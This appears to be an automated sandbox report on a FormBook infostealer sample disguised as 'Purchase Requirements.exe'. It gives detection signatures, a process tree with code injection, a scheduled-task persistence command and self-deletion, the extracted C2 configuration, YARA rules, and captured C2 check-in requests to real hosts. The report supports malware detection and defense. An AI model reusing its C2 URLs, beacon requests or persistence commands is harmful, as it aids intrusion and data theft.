Loading ...

Play interactive tourEdit tour

Windows Analysis Report Purchase Requirements.exe

Overview

General Information

Sample Name:Purchase Requirements.exe
Analysis ID:458827
MD5:5bd387d81d1d7d7fd4dbeabebbb46b1b
SHA1:a832689604786e188bcc5c9020c28f693b2eb460
SHA256:fe7e173fd8a3d646508573bb2f7ef52f7efd25a8e2aef1b754dcf95ceb797f8a
Tags:exeFormbook
Infos:

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected AntiVM3
Yara detected FormBook
C2 URLs / IPs found in malware configuration
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Uses schtasks.exe or at.exe to add and modify task schedules
Writes to foreign memory regions
Antivirus or Machine Learning detection for unpacked file
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • Purchase Requirements.exe (PID: 6556 cmdline: 'C:\Users\user\Desktop\Purchase Requirements.exe' MD5: 5BD387D81D1D7D7FD4DBEABEBBB46B1B)
    • schtasks.exe (PID: 6936 cmdline: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\UCnSWpQKXBXg' /XML 'C:\Users\user\AppData\Local\Temp\tmp47B.tmp' MD5: 15FF7D8324231381BAD48A052F85DF04)
      • conhost.exe (PID: 6992 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • MSBuild.exe (PID: 7032 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe MD5: D621FD77BD585874F9686D3A76462EF1)
      • explorer.exe (PID: 3424 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • colorcpl.exe (PID: 4592 cmdline: C:\Windows\SysWOW64\colorcpl.exe MD5: 746F3B5E7652EA0766BA10414D317981)
          • cmd.exe (PID: 5908 cmdline: /c del 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 5572 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.narrowpathwc.com/n8ba/"], "decoy": ["thefitflect.com", "anytourist.com", "blggz.xyz", "ascope.club", "obyeboss.com", "braun-mathematik.online", "mtsnurulislamsby.com", "jwpropertiestn.com", "animalds.com", "cunerier.com", "sillysocklife.com", "shopliyonamaaghin.net", "theredcymbalsco.com", "lostbikeproject.com", "ryggoqlmga.club", "realestatetriggers.com", "luvlauricephotography.com", "cheesehome.cloud", "5fashionfix.net", "wata-6-rwem.net", "ominvestment.net", "rrinuwsq643do2.xyz", "teamtacozzzz.com", "newjerseyreosales.com", "theresahovo.com", "wowmovies.today", "77k6tgikpbs39.net", "americagoldenwheels.com", "digitaladbasket.com", "gcagame.com", "arielatkins.net", "2020coaches.com", "effthisshit.com", "nycabl.com", "fbvanminh.com", "lovebirdsgifts.com", "anxietyxpill.com", "recaptcha-lnc.com", "aprendelspr.com", "expatinsur.com", "backtothesimplethings.com", "pcf-it.services", "wintonplaceoh.com", "designermotherhood.com", "naamt.com", "lifestylebykendra.com", "thehighstatusemporium.com", "oneninelacrosse.com", "mariasmoworldwide.com", "kitesurf-piraten.net", "atelierbond.com", "mynjelderlaw.com", "moucopia.com", "hauhome.club", "imroundtable.com", "thralink.com", "baoequities.com", "nassy.cloud", "goldenstatelabradoodles.com", "revenueremedyintensive.com", "dfendglobal.com", "pugliaandgastronomy.com", "cypios.net", "trinioware.com"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000007.00000002.769728719.00000000010C0000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000007.00000002.769728719.00000000010C0000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x8982:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x14695:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x14181:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x14797:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x1490f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x939a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x133fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xa112:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x19787:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1a82a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000007.00000002.769728719.00000000010C0000.00000040.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x166b9:$sqlite3step: 68 34 1C 7B E1
    • 0x167cc:$sqlite3step: 68 34 1C 7B E1
    • 0x166e8:$sqlite3text: 68 38 2A 90 C5
    • 0x1680d:$sqlite3text: 68 38 2A 90 C5
    • 0x166fb:$sqlite3blob: 68 53 D8 7F 8C
    • 0x16823:$sqlite3blob: 68 53 D8 7F 8C
    00000007.00000002.769097230.0000000000400000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000007.00000002.769097230.0000000000400000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x8982:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x14695:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x14181:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x14797:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x1490f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0x939a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x133fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xa112:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x19787:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1a82a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 18 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      7.2.MSBuild.exe.400000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        7.2.MSBuild.exe.400000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x77e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x7b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x13895:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x13381:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x13997:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x13b0f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x859a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x125fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0x9312:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x18987:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x19a2a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        7.2.MSBuild.exe.400000.0.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x158b9:$sqlite3step: 68 34 1C 7B E1
        • 0x159cc:$sqlite3step: 68 34 1C 7B E1
        • 0x158e8:$sqlite3text: 68 38 2A 90 C5
        • 0x15a0d:$sqlite3text: 68 38 2A 90 C5
        • 0x158fb:$sqlite3blob: 68 53 D8 7F 8C
        • 0x15a23:$sqlite3blob: 68 53 D8 7F 8C
        7.2.MSBuild.exe.400000.0.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          7.2.MSBuild.exe.400000.0.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x8982:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x14695:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x14181:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x14797:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x1490f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x939a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x133fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xa112:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x19787:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1a82a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 1 entries

          Sigma Overview

          System Summary:

          barindex
          Sigma detected: Possible Applocker BypassShow sources
          Source: Process startedAuthor: juju4: Data: Command: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe, CommandLine: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe, CommandLine|base64offset|contains: , Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe, ParentCommandLine: 'C:\Users\user\Desktop\Purchase Requirements.exe' , ParentImage: C:\Users\user\Desktop\Purchase Requirements.exe, ParentProcessId: 6556, ProcessCommandLine: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe, ProcessId: 7032

          Jbx Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Found malware configurationShow sources
          Source: 00000007.00000002.769728719.00000000010C0000.00000040.00000001.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.narrowpathwc.com/n8ba/"], "decoy": ["thefitflect.com", "anytourist.com", "blggz.xyz", "ascope.club", "obyeboss.com", "braun-mathematik.online", "mtsnurulislamsby.com", "jwpropertiestn.com", "animalds.com", "cunerier.com", "sillysocklife.com", "shopliyonamaaghin.net", "theredcymbalsco.com", "lostbikeproject.com", "ryggoqlmga.club", "realestatetriggers.com", "luvlauricephotography.com", "cheesehome.cloud", "5fashionfix.net", "wata-6-rwem.net", "ominvestment.net", "rrinuwsq643do2.xyz", "teamtacozzzz.com", "newjerseyreosales.com", "theresahovo.com", "wowmovies.today", "77k6tgikpbs39.net", "americagoldenwheels.com", "digitaladbasket.com", "gcagame.com", "arielatkins.net", "2020coaches.com", "effthisshit.com", "nycabl.com", "fbvanminh.com", "lovebirdsgifts.com", "anxietyxpill.com", "recaptcha-lnc.com", "aprendelspr.com", "expatinsur.com", "backtothesimplethings.com", "pcf-it.services", "wintonplaceoh.com", "designermotherhood.com", "naamt.com", "lifestylebykendra.com", "thehighstatusemporium.com", "oneninelacrosse.com", "mariasmoworldwide.com", "kitesurf-piraten.net", "atelierbond.com", "mynjelderlaw.com", "moucopia.com", "hauhome.club", "imroundtable.com", "thralink.com", "baoequities.com", "nassy.cloud", "goldenstatelabradoodles.com", "revenueremedyintensive.com", "dfendglobal.com", "pugliaandgastronomy.com", "cypios.net", "trinioware.com"]}
          Multi AV Scanner detection for dropped fileShow sources
          Source: C:\Users\user\AppData\Roaming\UCnSWpQKXBXg.exeReversingLabs: Detection: 33%
          Multi AV Scanner detection for submitted fileShow sources
          Source: Purchase Requirements.exeVirustotal: Detection: 33%Perma Link
          Source: Purchase Requirements.exeReversingLabs: Detection: 33%
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 7.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000007.00000002.769728719.00000000010C0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.769097230.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.769766552.00000000010F0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.697236239.0000000003CE6000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000F.00000002.920407109.00000000041B0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000F.00000002.919573194.0000000000210000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000F.00000002.920195745.0000000002AF0000.00000040.00000001.sdmp, type: MEMORY
          Machine Learning detection for dropped fileShow sources
          Source: C:\Users\user\AppData\Roaming\UCnSWpQKXBXg.exeJoe Sandbox ML: detected
          Machine Learning detection for sampleShow sources
          Source: Purchase Requirements.exeJoe Sandbox ML: detected
          Source: 7.2.MSBuild.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: Purchase Requirements.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Source: Purchase Requirements.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: colorcpl.pdbGCTL source: MSBuild.exe, 00000007.00000002.769799256.0000000001129000.00000004.00000020.sdmp
          Source: Binary string: colorcpl.pdb source: MSBuild.exe, 00000007.00000002.769799256.0000000001129000.00000004.00000020.sdmp
          Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000008.00000000.710084049.0000000005A00000.00000002.00000001.sdmp
          Source: Binary string: f:\binaries\Intermediate\ndp_msbuild\xmakecommandline.csproj_1613737345\objr\x86\MSBuild.pdb source: colorcpl.exe, 0000000F.00000002.921158643.0000000004927000.00000004.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: MSBuild.exe, 00000007.00000002.770164401.00000000013C0000.00000040.00000001.sdmp, colorcpl.exe, 0000000F.00000002.920589747.00000000043F0000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: MSBuild.exe, colorcpl.exe
          Source: Binary string: f:\binaries\Intermediate\ndp_msbuild\xmakecommandline.csproj_1613737345\objr\x86\MSBuild.pdbD source: colorcpl.exe, 0000000F.00000002.921158643.0000000004927000.00000004.00000001.sdmp
          Source: Binary string: wscui.pdb source: explorer.exe, 00000008.00000000.710084049.0000000005A00000.00000002.00000001.sdmp
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then pop esi
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 4x nop then pop esi

          Networking:

          barindex
          Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49765 -> 23.227.38.74:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49765 -> 23.227.38.74:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49765 -> 23.227.38.74:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49769 -> 162.241.85.227:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49769 -> 162.241.85.227:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49769 -> 162.241.85.227:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49772 -> 160.153.136.3:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49772 -> 160.153.136.3:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49772 -> 160.153.136.3:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49773 -> 34.102.136.180:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49773 -> 34.102.136.180:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49773 -> 34.102.136.180:80
          C2 URLs / IPs found in malware configurationShow sources
          Source: Malware configuration extractorURLs: www.narrowpathwc.com/n8ba/
          Source: global trafficHTTP traffic detected: GET /n8ba/?YDKPpTg0=OvBvP1Su9fWFY0UPkW0anmpJM9mANCcukNJzgBj3kCnMbGPnYOnff5N4Ec4XgmlqGLmb&FHtx=1bcPl8l0PFatcZcp HTTP/1.1Host: www.thefitflect.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /n8ba/?YDKPpTg0=+h7Xj+nXKVKiaIR46Fq1cf2yPuoKyU42UFvvfLIT79wfatbgIi2aH2e1i+WvrVB3N3qO&FHtx=1bcPl8l0PFatcZcp HTTP/1.1Host: www.braun-mathematik.onlineConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /n8ba/?YDKPpTg0=gDLflU22h4aNrBeOW4VXQ696ddSmWDeh6I9xRo3nz/h3BsDrL/4ZQIL6r35kaA0glkfe&FHtx=1bcPl8l0PFatcZcp HTTP/1.1Host: www.mariasmoworldwide.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /n8ba/?YDKPpTg0=e60qEcsD/l81wB0bMHsW7u7BjuDaTcxFYqyxe5BzllGz/xR5NT7a3L6d+84tw9tNKT87&FHtx=1bcPl8l0PFatcZcp HTTP/1.1Host: www.goldenstatelabradoodles.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /n8ba/?YDKPpTg0=j7TP3kg+SFNkJlLKMby/j4R6QZto1j85Usiv6TCoiWa/2cyAi3BRSjJegq0lHS5IvzJL&FHtx=1bcPl8l0PFatcZcp HTTP/1.1Host: www.mynjelderlaw.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /n8ba/?YDKPpTg0=RqoVB/kRDotnM81a68VGCKAD0SwVXhGBA2hw7fPCanVTcO/r0wYF2QFNLO8vRrR2bvla&FHtx=1bcPl8l0PFatcZcp HTTP/1.1Host: www.narrowpathwc.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /n8ba/?YDKPpTg0=uqosld0xCubOoSnMdKEGpsNAFVDy7sF9Olr0VLFZOqMlxplbtWpRciavlLjLwEv6WKyy&FHtx=1bcPl8l0PFatcZcp HTTP/1.1Host: www.teamtacozzzz.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /n8ba/?YDKPpTg0=9vokcWjvDccQU4MCm09VADFSZD35cLZafv0mNDf58+cuq+V2woxjt+NJE4WV9inYEz7b&FHtx=1bcPl8l0PFatcZcp HTTP/1.1Host: www.theredcymbalsco.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 160.153.136.3 160.153.136.3
          Source: Joe Sandbox ViewASN Name: ONEANDONE-ASBrauerstrasse48DE ONEANDONE-ASBrauerstrasse48DE
          Source: Joe Sandbox ViewASN Name: GODADDY-AMSDE GODADDY-AMSDE
          Source: unknownTCP traffic detected without corresponding DNS query: 20.190.159.138
          Source: unknownTCP traffic detected without corresponding DNS query: 20.190.159.138
          Source: unknownTCP traffic detected without corresponding DNS query: 20.190.159.138
          Source: unknownTCP traffic detected without corresponding DNS query: 20.190.159.138
          Source: unknownTCP traffic detected without corresponding DNS query: 131.253.33.200
          Source: unknownTCP traffic detected without corresponding DNS query: 131.253.33.200
          Source: unknownTCP traffic detected without corresponding DNS query: 131.253.33.200
          Source: unknownTCP traffic detected without corresponding DNS query: 131.253.33.200
          Source: unknownTCP traffic detected without corresponding DNS query: 131.253.33.200
          Source: unknownTCP traffic detected without corresponding DNS query: 131.253.33.200
          Source: unknownTCP traffic detected without corresponding DNS query: 131.253.33.200
          Source: unknownTCP traffic detected without corresponding DNS query: 131.253.33.200
          Source: unknownTCP traffic detected without corresponding DNS query: 131.253.33.200
          Source: unknownTCP traffic detected without corresponding DNS query: 131.253.33.200
          Source: unknownTCP traffic detected without corresponding DNS query: 131.253.33.200
          Source: unknownTCP traffic detected without corresponding DNS query: 131.253.33.200
          Source: unknownTCP traffic detected without corresponding DNS query: 131.253.33.200
          Source: unknownTCP traffic detected without corresponding DNS query: 20.190.159.138
          Source: unknownTCP traffic detected without corresponding DNS query: 20.190.159.138
          Source: unknownTCP traffic detected without corresponding DNS query: 131.253.33.200
          Source: unknownTCP traffic detected without corresponding DNS query: 131.253.33.200
          Source: unknownTCP traffic detected without corresponding DNS query: 131.253.33.200
          Source: unknownTCP traffic detected without corresponding DNS query: 131.253.33.200
          Source: unknownTCP traffic detected without corresponding DNS query: 131.253.33.200
          Source: unknownTCP traffic detected without corresponding DNS query: 131.253.33.200
          Source: unknownTCP traffic detected without corresponding DNS query: 131.253.33.200
          Source: unknownTCP traffic detected without corresponding DNS query: 20.190.159.138
          Source: unknownTCP traffic detected without corresponding DNS query: 131.253.33.200
          Source: unknownTCP traffic detected without corresponding DNS query: 131.253.33.200
          Source: unknownTCP traffic detected without corresponding DNS query: 131.253.33.200
          Source: unknownTCP traffic detected without corresponding DNS query: 131.253.33.200
          Source: unknownTCP traffic detected without corresponding DNS query: 131.253.33.200
          Source: unknownTCP traffic detected without corresponding DNS query: 131.253.33.200
          Source: unknownTCP traffic detected without corresponding DNS query: 131.253.33.200
          Source: unknownTCP traffic detected without corresponding DNS query: 131.253.33.200
          Source: unknownTCP traffic detected without corresponding DNS query: 131.253.33.200
          Source: unknownTCP traffic detected without corresponding DNS query: 131.253.33.200
          Source: unknownTCP traffic detected without corresponding DNS query: 131.253.33.200
          Source: unknownTCP traffic detected without corresponding DNS query: 131.253.33.200
          Source: unknownTCP traffic detected without corresponding DNS query: 131.253.33.200
          Source: unknownTCP traffic detected without corresponding DNS query: 74.125.8.70
          Source: unknownTCP traffic detected without corresponding DNS query: 131.253.33.200
          Source: unknownTCP traffic detected without corresponding DNS query: 131.253.33.200
          Source: unknownTCP traffic detected without corresponding DNS query: 131.253.33.200
          Source: unknownTCP traffic detected without corresponding DNS query: 131.253.33.200
          Source: unknownTCP traffic detected without corresponding DNS query: 131.253.33.200
          Source: unknownTCP traffic detected without corresponding DNS query: 131.253.33.200
          Source: unknownTCP traffic detected without corresponding DNS query: 131.253.33.200
          Source: unknownTCP traffic detected without corresponding DNS query: 131.253.33.200
          Source: unknownTCP traffic detected without corresponding DNS query: 131.253.33.200
          Source: global trafficHTTP traffic detected: GET /n8ba/?YDKPpTg0=OvBvP1Su9fWFY0UPkW0anmpJM9mANCcukNJzgBj3kCnMbGPnYOnff5N4Ec4XgmlqGLmb&FHtx=1bcPl8l0PFatcZcp HTTP/1.1Host: www.thefitflect.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /n8ba/?YDKPpTg0=+h7Xj+nXKVKiaIR46Fq1cf2yPuoKyU42UFvvfLIT79wfatbgIi2aH2e1i+WvrVB3N3qO&FHtx=1bcPl8l0PFatcZcp HTTP/1.1Host: www.braun-mathematik.onlineConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /n8ba/?YDKPpTg0=gDLflU22h4aNrBeOW4VXQ696ddSmWDeh6I9xRo3nz/h3BsDrL/4ZQIL6r35kaA0glkfe&FHtx=1bcPl8l0PFatcZcp HTTP/1.1Host: www.mariasmoworldwide.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /n8ba/?YDKPpTg0=e60qEcsD/l81wB0bMHsW7u7BjuDaTcxFYqyxe5BzllGz/xR5NT7a3L6d+84tw9tNKT87&FHtx=1bcPl8l0PFatcZcp HTTP/1.1Host: www.goldenstatelabradoodles.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /n8ba/?YDKPpTg0=j7TP3kg+SFNkJlLKMby/j4R6QZto1j85Usiv6TCoiWa/2cyAi3BRSjJegq0lHS5IvzJL&FHtx=1bcPl8l0PFatcZcp HTTP/1.1Host: www.mynjelderlaw.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /n8ba/?YDKPpTg0=RqoVB/kRDotnM81a68VGCKAD0SwVXhGBA2hw7fPCanVTcO/r0wYF2QFNLO8vRrR2bvla&FHtx=1bcPl8l0PFatcZcp HTTP/1.1Host: www.narrowpathwc.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /n8ba/?YDKPpTg0=uqosld0xCubOoSnMdKEGpsNAFVDy7sF9Olr0VLFZOqMlxplbtWpRciavlLjLwEv6WKyy&FHtx=1bcPl8l0PFatcZcp HTTP/1.1Host: www.teamtacozzzz.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /n8ba/?YDKPpTg0=9vokcWjvDccQU4MCm09VADFSZD35cLZafv0mNDf58+cuq+V2woxjt+NJE4WV9inYEz7b&FHtx=1bcPl8l0PFatcZcp HTTP/1.1Host: www.theredcymbalsco.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: unknownDNS traffic detected: queries for: www.thefitflect.com
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeDate: Tue, 03 Aug 2021 17:27:40 GMTServer: ApacheX-Powered-By: PHP/7.4.21Expires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <http://braun-mathematik.de/wp-json/>; rel="https://api.w.org/"Data Raw: 34 65 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 64 65 2d 44 45 22 3e 0a 0a 09 3c 68 65 61 64 3e 0a 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 0d 0a Data Ascii: 4e<!DOCTYPE html><html class="no-js" lang="de-DE"><head><meta charset="
          Source: colorcpl.exe, 0000000F.00000002.921199277.0000000004AA2000.00000004.00000001.sdmpString found in binary or memory: http://cdn.jsinit.directfwd.com/sk-jspark_init.php
          Source: Purchase Requirements.exe, 00000000.00000002.701682940.0000000005930000.00000002.00000001.sdmp, explorer.exe, 00000008.00000000.717205094.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
          Source: Purchase Requirements.exe, 00000000.00000002.693037255.0000000002851000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
          Source: explorer.exe, 00000008.00000000.733281418.0000000002B50000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.comPA
          Source: Purchase Requirements.exe, 00000000.00000003.658862598.00000000009DB000.00000004.00000001.sdmp, explorer.exe, 00000008.00000000.717205094.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
          Source: Purchase Requirements.exe, 00000000.00000002.701682940.0000000005930000.00000002.00000001.sdmp, explorer.exe, 00000008.00000000.717205094.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
